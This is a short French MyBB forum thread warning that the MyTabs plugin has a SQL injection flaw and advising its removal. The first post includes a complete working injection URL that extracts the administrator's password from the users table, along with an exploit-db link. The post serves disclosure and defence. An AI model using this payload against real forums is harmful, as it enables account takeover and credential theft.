+- MyBB.support, le portail francophone de MyBB (https://mybb.support)
+-- Forum : MyBB.fr (https://mybb.support/forum-1.html)
+--- Forum : Annonces (https://mybb.support/forum-47.html)
+--- Sujet : MyTabs SQL Vulnerabilty (/thread-4588.html)
MyTabs SQL Vulnerabilty - dipsiii - 10-08-2011
Attention,
Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.
La seul solution est de supprimer le plugin.
Code :
http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -http://www.exploit-db.com/exploits/17595/
RE: MyTabs SQL Vulnerabilty - valix - 11-08-2011
Ouai j'avais dit a exdiogene et sa spyto , mais vu qu'il mon pas répondu ^^